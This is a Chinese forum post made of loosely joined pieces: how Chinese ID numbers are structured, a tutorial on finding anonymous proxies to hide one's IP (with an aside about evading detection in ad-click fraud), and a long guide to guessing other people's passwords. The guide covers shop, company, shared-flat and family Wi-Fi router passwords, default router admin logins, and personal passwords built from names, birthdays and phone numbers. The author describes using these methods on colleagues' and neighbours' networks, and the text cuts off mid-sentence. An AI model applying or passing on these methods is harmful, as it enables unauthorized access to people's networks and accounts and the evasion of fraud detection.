您需要登录并回复后才可以查看该文章内容

 1 如何获取身份证号码： 身份证号码是每个公民唯一的、终身不变的身份代码，是由公安机关按照公民身份号码国家标准编制的。 1、身份证号码的结构 ：身份号码是特征组合码，18位身份证由十七位数字本体码和一位校验码组成。排列顺序从左至右依次为：六位数字地址码，八位数字出生日期码，三位数字顺序码和一位数字校验码。 　　 2、地址码(前六位数）：表示常住户口所在县(市、旗、区)的行政区划代码。地址码的编码规则为：第一位表示地区，第一、二两位组合表示省，自治区,直辖市),第3、4为表示地区(市,州, 盟)，第5、6为表示县(旗,镇,区)的名称。　　3、出生日期码（第七位至十四位）：表示出生的年、月、日， 4、顺序码（第十五位至十七位）：表示在同一地址码所标识的区域范围内，对同年、同月、同日出生的人编定的顺序号，顺序码的奇数分配给男性，偶数分配给女性。 　　 5、校验码（第十八位数）：作为尾号的校验码，是由号码编制单位按统一的公式计算出来的，分别为罗马数字0、1、2、3、4、5、6、7、8、9、x中的某一位。 6、特殊规定：末尾的 996, 997, 998和 999这四个号为百岁以上老人的特殊规定编号,其他任何人都不会有该编号   

　一、代理服务器的类型　　代理服务器实际上是一台服务器，介于浏览器和你要访问的网站之间。当你通过代理服务器上网浏览时，浏览器不是直接到Web服务器中取回网页，而是首先向代理服务器发出请求，由代理服务器到要访问的网站上取回网页，然后再传送给你的浏览器。所以当你用代理服务器浏览时，网站记录下的是代理服务器地址，不会记录下你的IP地址的!目前网上的代理服务器很多，大都是免费的，代理服务器可以分成以下几种类型：　　1、按请求信息的安全性分类　　代理服务器有超级匿名代理、普通匿名代理和透明代理三种。　　其中超级匿名代理又有一级匿名、二级匿名代理之分。假如你用一级匿名代理连上某个服务器，服务器端的网管是不会知道你用了代理的、而且你的IP也查不出来!因为这种代理服务器是真正的匿名代理，它不会改变你的request fields(报文)，使服务器端看起来就像有个真正的客户浏览器在访问它。目前一级匿名代理在网上很少，这种代理服务器资源很是珍贵!　　至于二级匿名代理，其安全性就不如一级匿名代理了，使用二级匿名代理上网，服务器的网管虽然查不出你的IP，但是却知道你用了代理!　　普通匿名代理包括三级和四级匿名代理，这类代理服务器也能隐藏你的真实IP，但是会更改你的request fields，因此服务器端也会知道你用了代理!不过这种代理会剥离你的部分信息(就好比防火墙的stealth mode)，使服务器端探测不到你的操作系统版本和浏览器版本。　　透明代理(五级匿名代理)：这种代理会改编你的request fields(报文)，并传送你的真实IP，因此假如你用这种代理上网，就不能隐藏你的IP。　　2、按代理服务器的用途分类　　代理服务器可以分成以下几类：　　Http代理(端口一般为80、8080、3128、50050等)：主要代理浏览器访问网页。　　SSL代理(标准端口为443)：支持最高128位加密强度的http代理，可以作为访问加密网站的代理。　　FTP代理(端口一般为21、2121)：代理客户机上的ftp软件访问ftp服务器。　　Telnet代理(端口一般为23)：代理通信机的telnet，用于远程控制。　　POP3代理(端口一般为110)：代理客户机上的邮件软件用pop3方式收邮件。　　Socks代理(标准端口为1080)：是全能代理，支持多种协议，包括http、ftp请求及其它类型的请求。它分socks 4 和socks 5两种类型，socks 4只支持TCP协议而socks 5支持TCP/UDP协议，还支持各种身份验证机制等协议。　　此外，还有TUNNEL代理、文献代理、教育网代理、Ssso代理、Flat代理等，限于篇幅，这里就不展开介绍了。二、如何获得免费的代理服务器?　　最原始的方法就是用软件全搜索某个网段(例如用代理猎手ProxyHunter搜索)，这种方法简单、却很费时。　　1、 使用代理猎手ProxyHunter V3.1(下载地址[url]http://www.skycn.com/soft/1034.html[/url])　　首先点击“系统”/参数设置/验证数据设置，在弹出的窗口中点击“添加”;图1　　验证名 随意起，验证类型选择“特征字串”，在验证地址中输入一个验证代理服务器的网址，建议添入国外网站的地址(例如[url]http://www.yahoo.com/[/url])，因为用国内网址，验证出来的代理有可能出不了国;特征字串中填入验证页面标题栏的内容(即，例如Yahoo!，如右图1)，你可以点击“获取”察看网页源文件，然后复制之间的一段内容，粘贴出来即可;　　接下来回到“搜索结果”窗口，点击“验证全部”即可，结果中显示“free”的，即为能用的免费代理服务器。　　2、到网站上去下载　　如果你不想自己搜索代理，可以去一些网站下载。目前许多网站都提供了免费代理的地址，你用Baidu、Google搜一下Proxy或者免费代理，能找到这样的网站，以下是公布代理服务器较多的网站：　　免费代理服务器：[url]http://proxy.spousecare.com/anonproxy/proxy1.htm[/url]　　代理中国：[url]http://www.proxycn.com/[/url]　　中国代理服务器网：[url]http://www.cnproxy.com/proxy1.html[/url]　　国外：[url]http://www.stayinvisible.com/index.pl/proxy_list[/url]　　[url]http://www.proxy4free.com/page1.html[/url]　　[url]http://www.anonymitychecker.com/page1.html[/url]　　[url]http://www.publicproxyservers.com/page1.html[/url]　　3、验证能用的免费代理　　将网上收录到的代理列表，保存为一个以.txt后缀的文本文件，格式如下：　　210.19.193.109:1080@SOCKS4　　202.19.193.109:1080@SOCKS5　　213.19.193.109:21@ftp　　120.19.193.109:80@http图2　　然后运行代理猎手，点击“搜索结果”选项卡，点“导入结果”，将.txt格式的代理列表导入;点击“系统”按钮，选择“参数设置”;在“搜索验证设置”页面中，对“验证设置”项中的两个超时时间参数进行设置;最后上网，在“搜索结果”中点“验证全部”进行校验，“验证状态”为“free”(右图2)的那一行即为能用的免费代理服务器。三、验证匿名代理的等级　　以上代理猎手只能验证某个代理能否使用，无法查出代理的等级。了解代理的等级很重要，因为五级匿名代理就不能隐藏你的IP，只有用一级到四级匿名代理才能隐藏IP，其中一级匿名代理效果最好，它不仅能隐藏IP、还能让网管不知道你用了代理!　　要验证匿名代理的等级，可以使用proxysm代理超人正式版2.7、网隐一键通等软件，下面介绍验证的步骤：　　1、自动读取网页上的代理图3　　运行花刺代理验证1.8(下载地址[url]http://www.sendspace.com/file/81no3w[/url])，在主窗口中点击“添加资源”，输入公布代理服务器地址的网址(例如[url]http://proxy.spousecare.com/anonproxy/ANZ.htm[/url])，名称栏自定;然后点击“下载”，软件 就会自动从网页上读取代理(如图3)，如果不能读取，请点击“【设置】”，钩选“启用模糊匹配抓取网页”即可。　　接下来在主窗口点击选择第一行代理，按下Shift键，点击最后一行代理，然后点击“导出选定”，将代理全部保存为TXT文件(例如 ABC.TXT)。　　2、使用代理超人验证代理的等级　　运行代理超人正式版2.7(下载地址[url]http://www.proxycn.com/down/index.htm[/url])，点击菜单“管理”/导入代理，选择要导入的TXT文件(例如上面生成的ABC.TXT)，按“快速导入”把代理全部读进来。图4　　接下来点击菜单“高级”/系统设置/验证选项，选择“使用自定义网址验证”，点击“自动更新”;然后点击“测试”，稍等片刻，就得到了有效的匿名等级验证网址(图4)，点击“确定”返回主窗口;点击菜单“搜索”/验证全部代理，开始验证每个代理的等级。　　如果验证出来是“超级匿名”，就表示该代理是一级或二级匿名代理，用这种代理能隐藏你的IP;如果是“普通匿名”，表示是三级或四级匿名代理，用这种代理也能隐藏IP;如果是“透明匿名”，就不要用它，因为这种代理不能隐藏你的IP!“无效代理”表示不能使用的。　　3、使用“网隐一键通”验证代理的等级　　运行网隐一键通(下载地址[url]http://www.Labxw.com/downsoftware.asp[/url])在“选项设置”中点击“寻得代理”，然后点击“代开URL”，输入公布代理服务器地址的网址(例如[url]http://proxy.spousecare.com/anonproxy/ANZ.htm[/url]，下图5)，读入网页上的代理;图5　　接下来进入“验证设置”页面，点击“更新”，然后点击“测试”，更新验证代理等级的网址;然后回到“寻得代理”页面，点击“等级测试”/检查所有，验证所有代理的等级，显示结果如下图6：图6　　其中等级一栏显示为9的，表示该代理不能使用;显示为1表示是一级匿名代理;显示为2、3、4分别表示为二级、三级、四级匿名代理(这类代理只能隐藏IP，别人能知道你用了代理)。四、手工设置代理的方法　　得到超级匿名(1、2级)或“普通匿名”代理(3、4级)后，你在浏览器中设置一下，上网时就能隐藏IP，设置方法下：　　1、IE6.0图7　　在主菜单上选择“工具”→“Internet选项”→“连接”→“设置”，钩选“对此连接使用代理服务器”，将代理服务器地址和端口填入即可(如图7)。对于局域网用户，应点击“连接‘标签下面的’局网域设置”来设置代理。　　2、NETSCAPE　　选择主菜单上的“Edit”→“Preferences”→“advanced”→“proxies”→“Manual proxy configuration”→“View”，将代理服务器地址和端口填入，按“OK”完成。　　3、Opera　　选择主菜单上的“设置”→“Proxy选项”，将代理服务器地址和端口填入即可。五、隐藏自己IP的简便方法　　1、使用Hide IP Platinum　　Hide IP Platinum(下载地址[url]http://www.onlinedown.net/soft/41340.htm[/url])可以自动从网上搜索代理服务器，然后提供给你代理IP上网。运行Hide IP Platinum，在任务栏右下方会出现一个图标，每次点击该图标，软件就会提供给你一个代理IP，你打开IE就会自动用该代理浏览网页了!　　目前与Hide IP Platinum类似的代理软件有很多，功能和用法基本上大同小异，这类软件虽然用起来很方便，但是都有一个致命的缺点，就是它们提供的代理IP大多不是一级匿名，因此用这种代理上网，网管完全能够查出你的真实IP!　　2、用花刺代理　　希望网管无法查出你的真实IP?方法如下：首先用花刺代理验证读取公布代理服务器地址的网页，将得到的代理导出为TXT文件例如AJ.txt);然后在代理超人中导入AJ.txt，验证代理的等级，把得到的超级匿名、普通匿名导出为TXT文件(例如JG.txt);　　最后再运行花刺代理验证，导入JG.txt，选择一个代理，点击“设为IE代理”(下图8)，软件就会自动把该代理设置到IE中，这样你就能通过该代理、在IE中浏览网页了，WEB服务器的网管是查不出你的IP的!图8六、真正隐藏自己IP的秘技　　1、获得一级匿名代理　　只有用一级匿名代理上网才能真正隐藏IP，因为这样别人才不知道你的IP、而且也不知道你用了代理;如果你用其他等级代理，虽然也能隐藏IP，但是别人却知道你用了代理的!　　建议你先运行“网隐一键通”获得一级匿名代理，在“选项设置”中点击“寻得代理”，然后点击“代开URL”，读取公布代理服务器地址的网页，验证得到一级匿名代理(具体方法参见上文所述)。　　2、用一级匿名代理上网　　接下来，对于“网隐一键通”注册用户，可以点击选择某个一级匿名代理，然后右击鼠标，在弹出菜单中选择“现在就使用该代理…”，即可用一级匿名代理上网了;不过只有注册用户才能这样做。　　对于非注册用户，你只能使用“网隐一键通”验证得到一级匿名代理，然后在IE中自己设置这个一级匿名代理(操作步骤参见上文)，最后再用IE打开网页，就能真正隐藏自己IP地址、而且别人也不知道你用了代理!　　有的网友可能说，用软件NetAdjust Anonymous Proxy、PCMesh Anonymous Web Surfing也能隐藏IP上网，但是这两个软件都只能免费使用5天，继续使用就要花钱注册了CMesh Anonymous Web Surfing(下载地址[url]http://www.mydown.com/softdown/178/178950.html[/url])、Hide IP Platinum这两个软件虽然也能隐藏IP上网，但是它们不能提供一级匿名代理、供你上网，网管可以查出你的IP、或者知道你用了代理，如果你点广告作弊，是会被查出来的!

密码破解与心理学，内容非常丰富，认真学习的请保存下来耐心看完！第一部分：十大基本规律规律一：绝大多数人都高估了破译密码的难度和低估了自己密码存在的风险，因而，往往把能够破解密码的人当成神秘人物，同时基本很少有修改自己密码的习惯。规律二：绝大多数人一生常用的密码通常不会超过3个，如果你破解了某人的QQ密码，很可能你也破解了他的论坛密码、邮箱密码、游戏账号密码……规律三：从 性别上看，男性的密码比女性的要更加难破；从年龄层面上看，年轻人的密码比35岁以上的人群的密码更加难破；从受教育层度上看，大专以上学历的人群相对于 以下学历人群，密码破解难度更大，且大专、本科、硕士学历的人群密码破解难度基本上没有什么区别；从专业角度上看，理科生的密码比起文科生要难破一些，计 算机相关专业的学生密码破解难度最大。规律四：绝大多数人的密码，基本上都是有确定含义的，随机乱码组成的密码极度罕见（应该说我从来没有遇到过，不过如果是这种密码，我这种基于心理的思路，可以确定毫无办法）。规律五：大多数人的密码要么纯粹用数字组成，要么纯粹用小写字母组成，要么用数字加字母组成，只有很少人会采用下划线，极少数的人字母区分大小写。规律六：密码所采用的字母中，很多都是姓名拼音、名字拼音的全部或首字母缩写，某一图腾的英文单词（通常是名词）——图腾的含义后面会提到，某一单位名的首字母缩写，以及某一地名的拼音或英文及其缩写。规律七：密码所采用的数字中，很多有关日期，且该日期对密码所有人拥有极其重要的意义，还有很多与地名和电话号码有关。规律八：使用下划线的密码，下划线通常只出现一次，一般这类密码的主人密码保护意识很强，其密码往往还包含数字和字母，这种密码的下划线的位置通常处在数字和字母的分隔处；字母区分大小写的密码，大写通常只出现一次，并且很多时候都出现在密码的开头，极少数出现在结尾。规律九：除非所登录系统有严格的位数限制，否则密码的位数通常是8位到11位，7位以下的密码和12位以上的密码较为少见。规律十：公 共网络的密码通常很少包含个人信息，大多数是单位名称的全部或某一部分的中文或英文全称，或者英文或拼音的首字母缩写，外加拥有特定含义的数字，这种数字 通常是电话号码或者门牌号，另外，有些密码是上述特定字母或其缩写的简单重复，如：12341234、abcabcabc；个人密码则很少出现上述简单重 复的情况。第二部分：十大规律隐含的心理学特性一、惰性从上述很多条规律都可以看出人或多或少存在惰性，比如很少人会定期修改密码；再如很少人密码会区分大小写，因为这样的话必须进行至少一次大小写切换；再如各种不同账号使用同一密码都是人存在惰性的有力证明。二、自我意识自我意识很多时候体现在使用名字的密码上，通常，自我意识较为强烈的人，很看重自己的名号或者名誉，因而，其密码一旦使用自己的名字，往往就是名字的全拼， 较少使用缩写，更不会省略自己的姓氏，另外，这类人也有很大一部分使用的是某一图腾的英文单词，例如某人非常崇拜某一偶像，那么，这个偶像就是他的图腾， 其密码很有可能与这个图腾有关。三、自我保护意识从公用密码很少包含个人信息这一点很容易印证自我保护的问题，一般来说，当某一网管或其他特定工作性质的人需要为某公用账号设置密码时，首先需要考虑的是密 码易为别人所理解和记忆，然而，一个人在考虑秘密之类的东西时，首先联想的是他自己身上的东西，由于这些东西涉及其个人隐私，因而很容易被他的潜意识所排 除。四、爱与责任感不少人的密码会使用伴侣和孩子的姓名或生日、结婚纪念日、自己公司成立日期等诸如此类的信息，这很明显地体现了爱和责任感。五、完美主义倾向完美主义倾向在密码中主要体现在对称与平衡上面，这从名字加日期的组合式密码和带下划线的密码可以很容易看出来，例如，某人叫做张三，生日是1980年1 月1日，那么，如果采用前者，其密码往往是zhangsan19800101或者zhangsan8011，不大可能设置成 z1h9a8n0g0s0a1n01这种类型；如果使用下划线密码，则很大可能会采用zhangsan_19800101或者 zhang_san_19800101，不大可能采用_zhangsan19800101或者z_hangsan19800101这种类型。第三部分：常见的无脑型密码所谓无脑型密码，指那种破解起来没有任何技术含量，纯粹依靠运气就可以破解的密码，这种密码通常为公用，其结构很多时候为：某一数字的简单重复，某一简单规 则的数字序列，某一简单规则的字母序列，按某种简单规则组合的数字和字母序列，以上四种密码有以下一些典型例 子：01223456789,1234567890,123123123,12341234,0987654321，13579824680。或者这样：qwertyuiop，abcabcabc，abcdabcd，abcdefg, 八个8,八个6，八个1，八个0，八个或者九个9，abcd1234,abc123abc123,abcd4321，所在城市区号的简单重复，等等。这种无脑型密码常见于公用的网络或者邮箱账号，尝试破解公共密码的时候，通常优先选用以上提到的这些密码进行尝试，在北京的时候，我用 qwertyuiop破解了一次路由器的密码，来到潮州之后，第一次用1234567890破解了一次密码，后来才知道是同事手机网络的密码，现在用的网络是邻居的，密码是8个8.第四部分：公共网络的路由器密码破解法其实从严格意义上来讲，只要接了路由器，那么，其网络必定是共享的，因而只要接了路由器的网络，都可以看成是公用网络，区别在于公用的程度，一般来说，从公用的程度来讲，路由器可以分为四类：公共场所、公司、公租房、家庭，其中公用程度越高，密码破解难度就越低。一、公共场所的路由器密码破解法公共场所通常包括旅馆、饮食场所、网吧、商场等人流量大，人群确定但身份群不稳定的场所，这种场所的网络基本上不会包含任何个人信息，且大多数密码都是无脑型密码，此外最常见的密码是以下几种：场所名称的拼音或英文的简单重复场所门牌号的简单重复或前半部分为门牌号，后一部分为门牌号的倒序场所名拼音或英文加上场所所在门牌号或分店号场所预约电话、送餐电话或400免费服务电话场所名拼音或英文加上4位到6为无脑型密码场所门口某路公交车号码的简单重复总的来说，很多的场所是不设置密码的，设置密码的作用也不大，其设置密码的目的通常是防止临近商家或住户的盗用，但只要这些用户稍微花点心思，则获取密码易如反掌。二、公司路由器密码破解法如果你在搜索网络的时候，搜索到网络名为4位以上的大写英文字母的，这种网络很有可能是公司网络，其密码的组合通常非常简单，除了以上提到的无脑型密码以外，很有可能采用如下几种形式。公司名拼音或英文的简单重复，如中国移动，其某一门店的哦网络有可能是zgydzgyd，或者chinamobile公司门牌号的简单重复或者前半部分为门牌号，后一部分为门牌号的倒序，例如某公司位于某栋大楼的1606室，那么其密码有可能是16061606或者16066061公司前台电话号码，有时还会加上公司所在城市的区号公司名拼音或英文加上公司门牌号公司名拼音或英文加上某一4位到6位的无脑型密码公司名拼音或英文缩写加上电话号码或电话号码的最后4位总之，公司的网络由于用的人多，所以，其密码包含的较难记住的信息越少，破解难度是非常低的，只要有耐心多尝试几次，一般来说，都不难破解，至于公司的名称、门牌号码和电话号码如何获得，这个我想只要你在一些写字楼上过班，都不用我来教你。三、公租房路由器密码破解法这里所谓的公租房，是指来自不同地方彼此不认识的人或者彼此要好的同学、朋友、同事一起租住的房子，包括大学宿舍，职工宿舍，同时还包括彼此独立租房，但共用一个网络的用户群。公租房的密码类型已经或多或少接近于家庭密码，但由于成员关系不如家庭那么亲密，因而，其包含的个人信息依然较少，破解的成功率依然较为可观。除了上述提到的无脑型密码以外，公租房的密码通常还有以下几种类型：所在小区名或楼层名拼音的全部或者拼音简写的简单重复，例如“金碧花园”用户，其密码就有可能是jinbihuayuan或者jbhyjbh房号或者楼号加房号或其简单重复，或者前一部分为房号，后一部分为房号的倒序，例如我在北京时候住在某栋小区的2号楼2单元1202房，我为租用我网络的 用户设置的密码就是12022021；同时，尝试过登录邻居路由器的时候，住在1201的公租房用户，其密码为12011201；住在11楼3号房的用 户，其路由器密码为02021103。小区名的简写加上房号，例如，我在北京住的小区名为华龙美晟，搜到我楼下2号房的用户，其路由器密码为hlms1102。宿舍电话号码或者前面加上区号，例如，广州某大学宿舍的电话号码为61306325，那么，其密码有可能就是61306325或者02061306325.公租房用户都要经常用到的某一电话号码，例如送水电话，送煤气的电话，送餐电话，等等。四、家庭路由器密码破解法家庭密码在这四类密码中间，相对来说是最容易破解的，因为大家彼此都很亲密，因而，这类密码通常包含了不少家庭方面的信息，不过，从人性的角度来将，再亲 密的人彼此之间也是存在隐私的，因而，这类密码通常不会包含真正内心深处的隐私，因而，相对于个人密码来讲，其破解难度要低得多。不少的家庭路由器密码依然使用上述的无脑型密码，另外一些则具备公租房密码的特点，以上这些都不再赘述，下面谈谈家庭路由器密码相对于公租房密码所不具备的特点及其破解方法。家庭姓氏拼音的简单重复，这种常见于姓氏拼音4个字母以上的家庭，如张、周等，而像李、林一类的姓氏，这种方式就要少见得多。另外，有趣的是，以姓氏进行 简单重复的密码，其首字母通常会采用大写，有的甚至是遇到第一个字母就大写一次的现象，例如某一姓张的家庭，其密码有可能会采用Zhangzhang或者 ZhangZhang的格式。家庭所居住的房屋的电话号码或者区号加上电话号码，这类密码有时候家庭会出于安全考虑，在电话号码最后会加上一位到两位防盗码。例如，某家庭的电话号码是81008100，那么其路由器密码有可能会是810081000，最后一个0就是防盗码。老家的电话号码，这是我阅读上面提到的那份资料所发现的一个密码规则，当时我发现有几个人采用这种类型的密码，其中一个人注册资料填写的寄件地址是北京， 而户籍地址是河北某县的，而其密码以0开头，看起来像一个电话号码，因而上网查找，果然发现这个密码的前面几个数字与其户籍地址所在的县城区号相对应，因 而断定这是一个老家的电话号码，尽管这属于个人密码，但是由于老家的电话是家庭成员所共知的，因而完全有可能被用作路由器密码。家庭姓氏的拼音加上电话号码或者手机号码。以下几条是我认为可能存在的规则，但是由于之前破解的过程没有相关的信息，因而没有经过验证的，一并提出来供大家参考。夫妻两个人的姓氏加上结婚纪念日，有可能是两个姓氏连在一起，后面加上结婚纪念日；也有可能是两个姓氏分别放在两端，结婚纪念日放在中间。第一个孩子的姓名、小命加上孩子生日。父亲或者母亲的生日。夫妻之间妻子的姓名，丈夫私底下对其的爱称加上妻子的生日。这一条是有性别的分工所决定的，因为通常涉及电脑的东西，男性懂得会更多，因此借此机会向配偶表达一下爱意是完全可能的。家里养的宠物的名字加上某一特定含义的数字。总之，只要你掌握足够的信息，通过这上面已经经过验证和没有经过验证的几条规律，就有极大的可能破解人家的路由器密码。以上就是几种人群分布所在网络的路由器密码破解的主要内容，而有的时候，破解密码甚至都不需要用到以上的方法，因为路由器通常也就是那么几个品牌，而很多 品牌的路由器地址都是固定的，例如TP-link及其他很多品牌的很多型号使用的地址是192.168.1.1，像腾达则很多使用 192.168.0.1，而各大品牌的路由器的默认初始登录账号和密码都是admin，偏偏很多人又不会操作，有的即使懂得操作也不愿意去修改路由器的登 录密码，因而有时候你可能很轻松的就进入人家的路由器去进行诸如设定固定IP、修改流量、重启路由器等操作。如果你搜索某个网络的网络名是诸如 Tenda，TP-link_2D18FA这样的含有品牌名的网络，那么，很有可能他的路由器登录密码也是没有修改的，只要你懂得路由器怎么操作，那么， 这种网络是很容易就突破了。第五部分：基于性格分析的个人密码破解法一、个人密码常用的组成要素自己姓名、伴侣姓名、孩子姓名的拼音或其缩写。自己生日、伴侣生日、孩子生日、父亲或母亲生日、自己公司开张纪念日、结婚纪念日、某个亲人的忌日等对密码主人有特别重要意义的日期。家庭电话号码、老家电话号码、个人手机号码、爱人手机号码。身份证、房产证、驾驶证、自己公司的经营许可证、营业执照等证件的号码或其号码段。与自己所追求或崇拜的事物有关的事物（即：图腾）的名称或日期。自己、亲人、宠物、图腾的昵称。爱人或者某一图腾的名称（通常是简称），加上1314（一生一世）或者5201314（我爱你一生一世）这样拥有谐音特性的数字串。二、图腾“图腾”体现在现代人的精神世界里，很多的时候是爱、理想、人格参照物等美好事物的象征。其一般意义通常与宗教或者原始崇拜有关，而宗教之所以能够一直存 在，很大程度在于其能直达人类的内心深处，密码“密”的特点与图腾的这种特点很容易就能够互相结合，因而，与图腾相关联的一些事物，很容易被人们选作密码 的载体。在密码中，常见的图腾通常有以下几种：初恋对象的名字拼音或其缩写，或者昵称的英文，初恋对象的生日或与初恋各种第一次的日期，与初恋对象有关的事物，例如某只宠物的名字、第一次约会的地点。某个特别崇拜的人物的姓名、外号或者生日、忌日。某个特别向往的地方的名字，包括发誓一辈子无论如何要去一次的地方或者故乡。某个特别向往的神话人物或一种与一种理想生活有关的事物，例如：乌托邦（Utopia）。某个童年时期对自己影响极深的人物的名字或者事物的名称，例如：电影《公民凯恩》中，凯恩至死都念念不忘的“rosebud”，如果凯恩生在现代，那么，我刚说他的密码百分之百会包含这个单词。三、不同人格类型的人群使用密码的习惯由于各自使用的标准不同，古今中外各种心理学家和人物学家，对于人群的分类方法可谓千差万别，例如：儒家通常会将人分为圣人、君子、小人，三国时期的刘劭则 将人按才的不同分为英、雄、俊、杰，中国的命理学更是将人按照生辰八字的结合分出“财官双美格”、“食神生财格”等多种类型，而“阴阳二十五人”分类法则 将人按照五行体现的气质将人分为二十五类；西方心理学有按星座进行区分的，还有按照九型人格进行区分的，而像弗洛伊德则将人的思想分为有意识和无意识两 种，施普兰格尔则把人格分为理论、经济、艺术、社会、政治 、宗教6种类型………由于理论基础不一样，因而其分类方法就不一样，对于密码来说，上述无论任何一种理论所提供的分类方法都难以能够和该人群的密码使用习惯一一对应，因而，下面我将结合自己的经验以及自己的思考，对不同类型的密码所对应的人群进行分类。由于自己过往破译的密码并不算太多，而阅读过的那份材料所涉及的人又全部素未谋面，加上我并没有学过系统的心理学课程，因而，以下的分类方法未必科学，难 免会遗漏某些人格类型，同时，也缺乏统计学意义上的证据作为支撑，因而你不妨把他看成是一种无稽之谈。需要特别指出的是，以下分类所涉及的人群，并没有严 格的界限，有很多人同时兼具不同的性格特点，因而其密码也会同时拥有各自的特点。1、责任感型责任感通常来源于自信以及对家人强烈的爱，这种人通常在社会上比较成功，对社会现象有特定的判断标准，且其看法不容易为别人所动，体现在生活习惯上，他们选 择工作时通常比较谨慎而且目标明确，日常生活较为单一，除了工作以外，他们会花很多的时间陪家人，赚来钱通常花在家人身上或者交给爱人保管。这种人群的密 码通常包括以下的要素：爱人的姓名、昵称或生日，结婚纪念日，孩子的姓名、昵称或生日，老家的电话号码，父亲或母亲的生日。2、洁癖型此处指精神意义上的洁癖，这种人的思想中存在一个特定的界限，这个界限是无论自己还是别人都不允许逾越的禁区。这种人要么特别成功，要么整天抱怨；要么像个 外交家，要么极度孤僻；同时他们别人的某些行为或者社会想象拥有常人所难以理解的评判标准，这种人的自我意识通常很强，而且对某种理想的人事或者生活拥有 强烈的向往，在他们的内心深处，通常埋藏着一段失败但又刻骨铭心的情感经历。这一类型的人，其密码最大的可能是使用图腾。3、两肋插刀型这一类人通常具备很强的领袖气质，而且极度自信，他们通常有很多的朋友，而且非常好动，属于坐久了屁股就会长疮的人，他们隔三岔五就会带一大群朋友回家吃饭 或者睡觉，也经常夜不归宿，朋友需要帮忙的时候，他们通常会二话不说地伸出援手，也经常路见不平，他们通常自我意识强烈，很少对人设防。其密码的类型通常 不是无脑型就是自己的姓名加上出生年月，且姓名必定是姓氏加名字的全部字母，极少使用简写，顶多加上一两位的防盗码，有时也会使用亲人的信息。4、幻想型幻想型通常存在于花季少女，这种人的QQ空间、博客和微博通常带有炫目的色彩，通常使用一些童话、神话或幻想世界中才有可能存在的事物，他们追求时尚，爱看 偶像剧，常会做出孩子气的行为，对小动物通常非常呵护，有不少人有养宠物的习惯，她们通常家庭条件较好，从小受惯长辈的宠爱，她们内心深处通常非常自私， 尽管外表并非如此。这种人的密码类型通常使用图腾，且该图腾一般是某个白马王子的姓名或者生日，或者宠物的名字，或者某种她幻想中的理想事物。5、好斗型所谓好斗型，并非指表面上爱与人争吵或者打架，而是指表面上不懂声色，但却在暗处与你暗暗较劲的人，例如某次你考了第一名，而他考了第三名，在别人都恭维 你，要你请客吃饭的时候，他会找借口不去，或显得心事重重，私底下会更加卖力学习，期望下一次考试超越你。这种人通常自我意识强烈，拥有让人难以忍受的自 负，妒忌心也很强。这类人的密码通常与他自己有关，其使用的密码，通常要么包含自己的昵称、姓名、手机号码或生日，也有很大几率使用图腾，且这个图腾极有 可能是他在孩提时代或青春期对他成长产生强烈影响的事物。6、事业领袖型这种人通常也具备很强的责任感，但与责任感型的人相比，他们的责任感的重心更多的放在工作上，他们严格要求自己，更加严格地要求自己的下属和亲人，有时会 让人觉得无法忍受，工作起来，这种人是废寝忘食的，当他投入工作的时候，决不允许别人打扰他，说话的时候，一旦被人打断或者听到不想听的话，就会直接质问 对方，这种人的密码，很多时候会使用自己的名字或者昵称，且很多时候会使用缩写或者不包括姓氏的名字拼音，或者与他公司或者事业有关的名称或号码，有时也 会使用图腾，且该图腾要么是他认为别人绝对意想不到的事物。7、完美主义者其实每个人或多或少都有完美主义的倾向，对于完美主义倾向比较显著的人来说，他们未必注重自己着装的品位，但是他们会追求有品质的事物；他们崇拜的对象通 常都是人格、智力都看上去完美无缺的人；他们的房间通常物品摆放整齐，有时出门走到半路，想起家里某个物品没有摆放好，甚至会跑回来把他放到让自己看起来 安心的位置；他们通常喜欢自己整理自己的房间，不喜欢让别人插手，因为，在他们看来，由别人经手的东西都是不完美的；这种人通常严于律己，洁身自好，而且 在道德上有种让一些小人难以忍受的优越感；这类人也许也会讲脏话，但在他们内心深处，对纯洁的爱情却极度向往，大多数这方面的男性拥有处女情结，女性则通 常向往王子公主式样的爱情。这类人的密码，一旦使用名字，则名字很大几率是全名，或者是某一特定的单词（如love，great等具有美好意义的形容词） 加上全名的简称，一旦使用日期则日期通常是20120101这样的格式，很少会选择1211或120101这种格式，一旦使用电话号码，则电话号码通常包 含区号，他们手机的电话簿，每个人的人名通常是全名，极少会忽略姓，也很少使用昵称；一旦使用下划线，则下划线的位置通常是能够高度体现对称美的。8、现实主义者现实主义者体现在思想上，不相信奇迹，他们行为上不容易走极端，但思想上却非常极端，例如，他们相信某个名人的成功是难以复制的，尤其是他身边的人；他们认 为官员中没有好官，娱乐圈的女性每个都被潜规则过，有时候和他们交谈，你会忍受不了他们满口的大道理。这类人的密码，一旦使用姓名，通常是简写，日期则以 简约型的居多，如果使用下划线，他们对于对称没有什么要求，有时下划线会出现在第一位，字母区分大小写的在这一类型的人中最为常见。以上八种人格类型，到目前为止，是我所能遇到并总结出来的全部有关密码在性格特征上的分类，在我过往所破解和遇到的密码中，还没有任何一个密码所对应的人 群逃得过以上所谈到的情况。另外，从星座的观点来看，还有一些比较有趣的现象，例如，责任感型密码通常分布在天蝎座、射手座、狮子座、处女座上面，洁癖型 的密码通常分布在水瓶座、双子座、天蝎座、白羊座和处女座，两肋插刀型则很多分布在白羊座、双鱼座、狮子座和摩羯座上面，幻想型绝大部分分布在双子座、天 平座、射手座、水瓶座上面，好斗型则很多分布在白羊座、巨蟹座、天蝎座、处女座和摩羯座上面，事业领袖型则很多分布在金牛座、狮子座、天平座和摩羯座，完 美主义者型则大多出现在白羊座、天平座和水瓶座，现实主义者则很多分布在金牛座、巨蟹座、射手座和摩羯座。另外，双子座、双鱼座和天平座最容易使用无脑型 